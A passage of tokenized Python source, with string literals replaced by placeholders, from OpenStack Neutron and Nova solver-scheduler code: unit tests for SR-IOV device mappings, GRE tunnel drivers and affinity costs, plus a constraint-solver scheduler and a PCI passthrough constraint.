, <EOL> '<STR_LIT>' ] <EOL> DEVICE_MAPPING_WITH_SPACES_LIST = [ '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> DEVICE_MAPPING = { '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] } <EOL> def test_defaults ( self ) : <EOL> self . assertEqual ( config . DEFAULT_DEVICE_MAPPINGS , <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings ) <EOL> self . assertEqual ( config . DEFAULT_EXCLUDE_DEVICES , <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> self . assertEqual ( <NUM_LIT:2> , <EOL> cfg . CONF . AGENT . polling_interval ) <EOL> def test_device_mappings ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_LIST , <EOL> '<STR_LIT>' ) <EOL> device_mappings = n_utils . parse_mappings ( <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings , unique_keys = False ) <EOL> self . assertEqual ( self . DEVICE_MAPPING , device_mappings ) <EOL> def test_device_mappings_with_error ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_WITH_ERROR_LIST , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , n_utils . 
parse_mappings , <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings , <EOL> unique_keys = False ) <EOL> def test_device_mappings_with_spaces ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_WITH_SPACES_LIST , <EOL> '<STR_LIT>' ) <EOL> device_mappings = n_utils . parse_mappings ( <EOL> cfg . CONF . SRIOV_NIC . physical_device_mappings , unique_keys = False ) <EOL> self . assertEqual ( self . DEVICE_MAPPING , device_mappings ) <EOL> def test_exclude_devices ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_LIST , <EOL> '<STR_LIT>' ) <EOL> exclude_devices = config . parse_exclude_devices ( <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> self . assertEqual ( self . EXCLUDE_DEVICES , exclude_devices ) <EOL> def test_exclude_devices_with_spaces ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_WITH_SPACES_LIST , <EOL> '<STR_LIT>' ) <EOL> exclude_devices = config . parse_exclude_devices ( <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> self . assertEqual ( self . EXCLUDE_DEVICES , exclude_devices ) <EOL> def test_exclude_devices_with_error ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_WITH_SPACES_ERROR , <EOL> '<STR_LIT>' ) <EOL> self . assertRaises ( ValueError , config . parse_exclude_devices , <EOL> cfg . CONF . SRIOV_NIC . exclude_devices ) <EOL> def test_validate_config_ok ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_LIST , <EOL> '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_LIST , <EOL> '<STR_LIT>' ) <EOL> config_parser = agent . SriovNicAgentConfigParser ( ) <EOL> config_parser . parse ( ) <EOL> device_mappings = config_parser . device_mappings <EOL> exclude_devices = config_parser . exclude_devices <EOL> self . assertEqual ( self . EXCLUDE_DEVICES , exclude_devices ) <EOL> self . assertEqual ( self . 
DEVICE_MAPPING , device_mappings ) <EOL> def test_validate_config_fail ( self ) : <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . DEVICE_MAPPING_LIST , <EOL> '<STR_LIT>' ) <EOL> cfg . CONF . set_override ( '<STR_LIT>' , <EOL> self . EXCLUDE_DEVICES_LIST_INVALID , <EOL> '<STR_LIT>' ) <EOL> config_parser = agent . SriovNicAgentConfigParser ( ) <EOL> self . assertRaises ( ValueError , config_parser . parse ) </s>
<s> from neutron . plugins . common import constants as p_const <EOL> from neutron . plugins . ml2 import config <EOL> from neutron . plugins . ml2 . drivers import type_gre <EOL> from neutron . tests . unit . plugins . ml2 . drivers import base_type_tunnel <EOL> from neutron . tests . unit . plugins . ml2 import test_rpc <EOL> from neutron . tests . unit import testlib_api <EOL> TUNNEL_IP_ONE = "<STR_LIT>" <EOL> TUNNEL_IP_TWO = "<STR_LIT>" <EOL> HOST_ONE = '<STR_LIT>' <EOL> HOST_TWO = '<STR_LIT>' <EOL> def _add_allocation ( session , gre_id , allocated = False ) : <EOL> allocation = type_gre . GreAllocation ( gre_id = gre_id , allocated = allocated ) <EOL> allocation . save ( session ) <EOL> def _get_allocation ( session , gre_id ) : <EOL> return session . query ( type_gre . GreAllocation ) . filter_by ( <EOL> gre_id = gre_id ) . one ( ) <EOL> class GreTypeTest ( base_type_tunnel . TunnelTypeTestMixin , <EOL> testlib_api . SqlTestCase ) : <EOL> DRIVER_MODULE = type_gre <EOL> DRIVER_CLASS = type_gre . GreTypeDriver <EOL> TYPE = p_const . TYPE_GRE <EOL> def test_get_endpoints ( self ) : <EOL> self . add_endpoint ( ) <EOL> self . add_endpoint ( <EOL> base_type_tunnel . TUNNEL_IP_TWO , base_type_tunnel . HOST_TWO ) <EOL> endpoints = self . driver . get_endpoints ( ) <EOL> for endpoint in endpoints : <EOL> if endpoint [ '<STR_LIT>' ] == base_type_tunnel . TUNNEL_IP_ONE : <EOL> self . assertEqual ( base_type_tunnel . HOST_ONE , endpoint [ '<STR_LIT:host>' ] ) <EOL> elif endpoint [ '<STR_LIT>' ] == base_type_tunnel . TUNNEL_IP_TWO : <EOL> self . assertEqual ( base_type_tunnel . HOST_TWO , endpoint [ '<STR_LIT:host>' ] ) <EOL> def test_get_mtu ( self ) : <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEqual ( <NUM_LIT> - p_const . 
GRE_ENCAP_OVERHEAD , <EOL> self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEqual ( <NUM_LIT> - p_const . GRE_ENCAP_OVERHEAD , <EOL> self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> } <EOL> self . assertEqual ( <NUM_LIT> - p_const . GRE_ENCAP_OVERHEAD , <EOL> self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:0> ) <EOL> config . cfg . CONF . set_override ( '<STR_LIT>' , <NUM_LIT:0> , group = '<STR_LIT>' ) <EOL> self . driver . physnet_mtus = { } <EOL> self . assertEqual ( <NUM_LIT:0> , self . driver . get_mtu ( '<STR_LIT>' ) ) <EOL> class GreTypeMultiRangeTest ( base_type_tunnel . TunnelTypeMultiRangeTestMixin , <EOL> testlib_api . SqlTestCase ) : <EOL> DRIVER_CLASS = type_gre . GreTypeDriver <EOL> class GreTypeRpcCallbackTest ( base_type_tunnel . TunnelRpcCallbackTestMixin , <EOL> test_rpc . RpcCallbacksTestCase , <EOL> testlib_api . SqlTestCase ) : <EOL> DRIVER_CLASS = type_gre . GreTypeDriver <EOL> TYPE = p_const . TYPE_GRE </s>
<s> import mock <EOL> from neutron . api . rpc . callbacks . consumer import registry as cons_registry <EOL> from neutron . api . rpc . callbacks . producer import registry as prod_registry <EOL> from neutron . api . rpc . callbacks import resource_manager <EOL> from neutron . tests . unit import testlib_api <EOL> class BaseQosTestCase ( testlib_api . SqlTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( BaseQosTestCase , self ) . setUp ( ) <EOL> with mock . patch . object ( <EOL> resource_manager . ResourceCallbacksManager , '<STR_LIT>' , <EOL> new_callable = mock . PropertyMock ( return_value = False ) ) : <EOL> self . cons_mgr = resource_manager . ConsumerResourceCallbacksManager ( ) <EOL> self . prod_mgr = resource_manager . ProducerResourceCallbacksManager ( ) <EOL> for mgr in ( self . cons_mgr , self . prod_mgr ) : <EOL> mgr . clear ( ) <EOL> mock . patch . object ( <EOL> cons_registry , '<STR_LIT>' , return_value = self . cons_mgr ) . start ( ) <EOL> mock . patch . object ( <EOL> prod_registry , '<STR_LIT>' , return_value = self . prod_mgr ) . start ( ) </s>
<s> """<STR_LIT>""" <EOL> from oslo_config import cfg <EOL> from oslo_log import log as logging <EOL> from oslo_utils import importutils <EOL> from nova . scheduler import filter_scheduler <EOL> from nova . scheduler import weights <EOL> CONF = cfg . CONF <EOL> LOG = logging . getLogger ( __name__ ) <EOL> solver_opts = [ <EOL> cfg . StrOpt ( '<STR_LIT>' , <EOL> default = '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) , <EOL> ] <EOL> CONF . register_opts ( solver_opts , group = '<STR_LIT>' ) <EOL> class ConstraintSolverScheduler ( filter_scheduler . FilterScheduler ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> super ( ConstraintSolverScheduler , self ) . __init__ ( * args , ** kwargs ) <EOL> self . hosts_solver = importutils . import_object ( <EOL> CONF . solver_scheduler . scheduler_host_solver ) <EOL> def _schedule ( self , context , request_spec , filter_properties ) : <EOL> """<STR_LIT>""" <EOL> instance_type = request_spec . get ( "<STR_LIT>" , None ) <EOL> instance_uuids = request_spec . get ( "<STR_LIT>" , None ) <EOL> config_options = self . _get_configuration_options ( ) <EOL> if instance_uuids : <EOL> num_instances = len ( instance_uuids ) <EOL> else : <EOL> num_instances = request_spec . get ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> solver_cache = { } <EOL> filter_properties . update ( { '<STR_LIT>' : context , <EOL> '<STR_LIT>' : request_spec , <EOL> '<STR_LIT>' : config_options , <EOL> '<STR_LIT>' : instance_type , <EOL> '<STR_LIT>' : num_instances , <EOL> '<STR_LIT>' : instance_uuids , <EOL> '<STR_LIT>' : solver_cache } ) <EOL> self . populate_filter_properties ( request_spec , filter_properties ) <EOL> selected_hosts = self . _get_selected_hosts ( context , filter_properties ) <EOL> filter_properties . pop ( '<STR_LIT>' ) <EOL> return selected_hosts <EOL> def _get_selected_hosts ( self , context , filter_properties ) : <EOL> """<STR_LIT>""" <EOL> elevated = context . 
elevated ( ) <EOL> hosts = self . _get_all_host_states ( elevated ) <EOL> selected_hosts = [ ] <EOL> hosts = self . host_manager . get_hosts_stripping_ignored_and_forced ( <EOL> hosts , filter_properties ) <EOL> list_hosts = list ( hosts ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : list_hosts } ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : filter_properties } ) <EOL> host_instance_combinations = self . hosts_solver . solve ( <EOL> list_hosts , filter_properties ) <EOL> LOG . debug ( "<STR_LIT>" , <EOL> { "<STR_LIT>" : host_instance_combinations } ) <EOL> selected_hosts = [ weights . WeighedHost ( host , <NUM_LIT:1> ) <EOL> for ( host , instance ) in host_instance_combinations ] <EOL> return selected_hosts </s>
<s> import copy <EOL> from oslo_log import log as logging <EOL> from nova . i18n import _LW <EOL> from nova_solverscheduler . scheduler . solvers import constraints <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class PciPassthroughConstraint ( constraints . BaseLinearConstraint ) : <EOL> """<STR_LIT>""" <EOL> def _get_acceptable_pci_requests_times ( self , max_times_to_try , <EOL> pci_requests , host_pci_stats ) : <EOL> acceptable_times = <NUM_LIT:0> <EOL> while acceptable_times < max_times_to_try : <EOL> if host_pci_stats . support_requests ( pci_requests ) : <EOL> acceptable_times += <NUM_LIT:1> <EOL> host_pci_stats . apply_requests ( pci_requests ) <EOL> else : <EOL> break <EOL> return acceptable_times <EOL> def get_constraint_matrix ( self , hosts , filter_properties ) : <EOL> num_hosts = len ( hosts ) <EOL> num_instances = filter_properties . get ( '<STR_LIT>' ) <EOL> constraint_matrix = [ [ True for j in xrange ( num_instances ) ] <EOL> for i in xrange ( num_hosts ) ] <EOL> pci_requests = filter_properties . get ( '<STR_LIT>' ) <EOL> if not pci_requests : <EOL> LOG . warn ( _LW ( "<STR_LIT>" <EOL> "<STR_LIT>" ) ) <EOL> return constraint_matrix <EOL> for i in xrange ( num_hosts ) : <EOL> host_pci_stats = copy . deepcopy ( hosts [ i ] . pci_stats ) <EOL> acceptable_num_instances = ( <EOL> self . _get_acceptable_pci_requests_times ( num_instances , <EOL> pci_requests , host_pci_stats ) ) <EOL> if acceptable_num_instances < num_instances : <EOL> inacceptable_num = num_instances - acceptable_num_instances <EOL> constraint_matrix [ i ] = ( <EOL> [ True for j in xrange ( acceptable_num_instances ) ] + <EOL> [ False for j in xrange ( inacceptable_num ) ] ) <EOL> LOG . debug ( "<STR_LIT>" <EOL> "<STR_LIT>" , <EOL> { '<STR_LIT:host>' : hosts [ i ] , <EOL> '<STR_LIT>' : acceptable_num_instances } ) <EOL> return constraint_matrix </s>
<s> import mock <EOL> from nova import context <EOL> from nova import test <EOL> from nova_solverscheduler . scheduler . solvers . constraints import aggregate_num_instances <EOL> from nova_solverscheduler . tests . scheduler import solver_scheduler_fakes as fakes <EOL> class TestAggregateNumInstancesConstraint ( test . NoDBTestCase ) : <EOL> def setUp ( self ) : <EOL> super ( TestAggregateNumInstancesConstraint , self ) . setUp ( ) <EOL> self . constraint_cls = aggregate_num_instances . AggregateNumInstancesConstraint <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . _generate_fake_constraint_input ( ) <EOL> def _generate_fake_constraint_input ( self ) : <EOL> self . fake_filter_properties = { <EOL> '<STR_LIT>' : self . context , <EOL> '<STR_LIT>' : <NUM_LIT:3> } <EOL> host1 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host2 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host3 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host4 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> self . fake_hosts = [ host1 , host2 , host3 , host4 ] <EOL> @ mock . patch ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> def test_get_constraint_matrix ( self , agg_mock ) : <EOL> self . flags ( max_instances_per_host = <NUM_LIT:1> ) <EOL> def _agg_mock_side_effect ( * args , ** kwargs ) : <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ '<STR_LIT:2>' , '<STR_LIT:3>' ] ) <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ '<STR_LIT:4>' ] ) <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ ] ) <EOL> if args [ <NUM_LIT:0> ] . host == '<STR_LIT>' : <EOL> return set ( [ '<STR_LIT>' ] ) <EOL> agg_mock . 
side_effect = _agg_mock_side_effect <EOL> expected_cons_mat = [ <EOL> [ True , True , False ] , <EOL> [ True , True , True ] , <EOL> [ True , False , False ] , <EOL> [ True , False , False ] ] <EOL> cons_mat = self . constraint_cls ( ) . get_constraint_matrix ( <EOL> self . fake_hosts , self . fake_filter_properties ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> agg_mock . assert_any_call ( self . fake_hosts [ <NUM_LIT:3> ] , '<STR_LIT>' ) <EOL> self . assertEqual ( expected_cons_mat , cons_mat ) </s>
<s> """<STR_LIT>""" <EOL> from nova import context <EOL> from nova import objects <EOL> from nova import test <EOL> from nova_solverscheduler . scheduler . solvers import costs <EOL> from nova_solverscheduler . scheduler . solvers . costs import affinity_cost <EOL> from nova_solverscheduler . tests . scheduler import solver_scheduler_fakes as fakes <EOL> class TestAffinityCost ( test . NoDBTestCase ) : <EOL> USES_DB = True <EOL> def setUp ( self ) : <EOL> super ( TestAffinityCost , self ) . setUp ( ) <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cost_handler = costs . CostHandler ( ) <EOL> self . cost_classes = self . cost_handler . get_matching_classes ( <EOL> [ '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> def _get_fake_hosts ( self ) : <EOL> host1 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host2 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host3 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host4 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> return [ host1 , host2 , host3 , host4 ] <EOL> def test_affinity_cost_multiplier ( self ) : <EOL> self . flags ( affinity_cost_multiplier = <NUM_LIT:0.5> , group = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:0.5> , affinity_cost . AffinityCost ( ) . cost_multiplier ( ) ) <EOL> def test_get_extended_cost_matrix_one_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . 
cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_multi_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_change_multiplier ( self ) : <EOL> self . flags ( affinity_cost_multiplier = <NUM_LIT:0.5> , group = '<STR_LIT>' ) <EOL> fake_hosts = self . 
_get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : instance1 } <EOL> fake_hosts [ <NUM_LIT:2> ] . instances = { instance2_uuid : instance2 } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <EOL> [ instance1_uuid , instance2_uuid ] } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , - <NUM_LIT:2> , - <NUM_LIT:4> , - <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:5> ] , <EOL> [ <NUM_LIT:0> , - <NUM_LIT:2> , - <NUM_LIT:4> , - <NUM_LIT:6> ] , <EOL> [ <NUM_LIT:1> , - <NUM_LIT:1> , - <NUM_LIT:3> , - <NUM_LIT:5> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_zero_multiplier ( self ) : <EOL> self . flags ( affinity_cost_multiplier = <NUM_LIT:0> , group = '<STR_LIT>' ) <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . 
cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_instance_list ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] , <EOL> [ - <NUM_LIT:0> , - <NUM_LIT:1> , - <NUM_LIT:2> , - <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_no_hint ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { } <EOL> } <EOL> fake_cost = self . 
cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> class TestAntiAffinityCost ( test . NoDBTestCase ) : <EOL> USES_DB = True <EOL> def setUp ( self ) : <EOL> super ( TestAntiAffinityCost , self ) . setUp ( ) <EOL> self . context = context . RequestContext ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . cost_handler = costs . CostHandler ( ) <EOL> self . cost_classes = self . cost_handler . get_matching_classes ( <EOL> [ '<STR_LIT>' <EOL> '<STR_LIT>' ] ) <EOL> def _get_fake_hosts ( self ) : <EOL> host1 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host2 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host3 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> host4 = fakes . FakeSolverSchedulerHostState ( '<STR_LIT>' , '<STR_LIT>' , { } ) <EOL> return [ host1 , host2 , host3 , host4 ] <EOL> def test_anti_affinity_cost_multiplier ( self ) : <EOL> self . flags ( anti_affinity_cost_multiplier = <NUM_LIT:2> , group = '<STR_LIT>' ) <EOL> self . assertEqual ( <NUM_LIT:2> , <EOL> affinity_cost . AntiAffinityCost ( ) . cost_multiplier ( ) ) <EOL> def test_get_extended_cost_matrix_one_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance_uuid = instance . uuid <EOL> fake_hosts [ <NUM_LIT:1> ] . instances = { instance_uuid : instance } <EOL> fake_filter_properties = { <EOL> '<STR_LIT>' : self . context . 
elevated ( ) , <EOL> '<STR_LIT>' : <NUM_LIT:3> , <EOL> '<STR_LIT>' : [ '<STR_LIT>' % x for x in range ( <NUM_LIT:3> ) ] , <EOL> '<STR_LIT>' : { '<STR_LIT>' : instance_uuid } <EOL> } <EOL> fake_cost = self . cost_classes [ <NUM_LIT:0> ] ( ) <EOL> expected_x_cost_mat = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ] ] <EOL> x_cost_mat = fake_cost . get_extended_cost_matrix ( fake_hosts , <EOL> fake_filter_properties ) <EOL> self . assertEqual ( expected_x_cost_mat , x_cost_mat ) <EOL> def test_get_extended_cost_matrix_multi_inst ( self ) : <EOL> fake_hosts = self . _get_fake_hosts ( ) <EOL> instance1 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance2 = objects . Instance ( uuid = '<STR_LIT>' ) <EOL> instance1_uuid = instance1 . uuid <EOL> instance2_uuid = instance2 . uuid <EOL> fake_hosts [ <NUM_LIT:0> ] . instances = { instance1_uuid : 